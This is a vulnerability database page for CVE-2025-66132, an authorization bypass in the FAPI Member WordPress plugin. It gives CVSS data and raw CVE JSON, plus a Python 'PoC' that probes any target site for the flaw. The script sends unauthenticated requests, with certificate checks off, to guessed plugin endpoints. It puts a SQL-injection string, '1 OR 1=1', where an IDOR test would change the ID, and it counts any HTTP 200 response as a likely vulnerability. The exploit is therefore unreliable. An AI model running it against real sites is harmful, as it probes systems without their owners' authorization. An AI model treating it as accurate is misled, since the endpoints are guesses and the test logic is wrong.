Security Vulnerability Report
中文
CVE-2025-66132 CVSS 5.3 MEDIUM

CVE-2025-66132

Published: 2025-12-16 09:15:58
Last Modified: 2026-04-27 17:16:41

Description

Authorization Bypass Through User-Controlled Key vulnerability in FAPI Business s.r.o. FAPI Member fapi-member allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FAPI Member: from n/a through <= 2.2.30.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FAPI Member <= 2.2.30 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66132 PoC - FAPI Member IDOR Authorization Bypass # Target: WordPress site with FAPI Member plugin <= 2.2.30 # Type: Authorization Bypass through User-Controlled Key import requests import sys target = input("Enter target URL (e.g., https://example.com): ").rstrip('/') cve_id = "CVE-2025-66132" print(f"[*] Testing {cve_id} - FAPI Member Authorization Bypass") print(f"[*] Target: {target}") # Common FAPI Member endpoints that may be vulnerable endpoints = [ "/wp-json/fapi-member/v1/member/{id}", "/wp-json/fapi-member/v1/profile/{id}", "/wp-json/fapi-member/v1/membership/{id}", "/wp-admin/admin-ajax.php?action=fapi_member_get_data&id={id}", ] for endpoint in endpoints: # Test with modified ID parameter to check for IDOR test_url = f"{target}{endpoint}".format(id="1 OR 1=1") print(f"\n[*] Testing endpoint: {test_url}") try: response = requests.get(test_url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Potential vulnerability - Endpoint accessible without proper authorization") print(f"[+] Response preview: {response.text[:200]}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint properly protected") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print(f"\n[*] For manual testing, try modifying resource IDs in requests") print(f"[*] Reference: https://patchstack.com/database/Wordpress/Plugin/fapi-member/vulnerability/wordpress-fapi-member-plugin-2-2-26-insecure-direct-object-references-idor-vulnerability")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66132", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:57.780", "lastModified": "2026-04-27T17:16:41.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in FAPI Business s.r.o. FAPI Member fapi-member allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FAPI Member: from n/a through <= 2.2.30."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fapi-member/vulnerability/wordpress-fapi-member-plugin-2-2-26-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}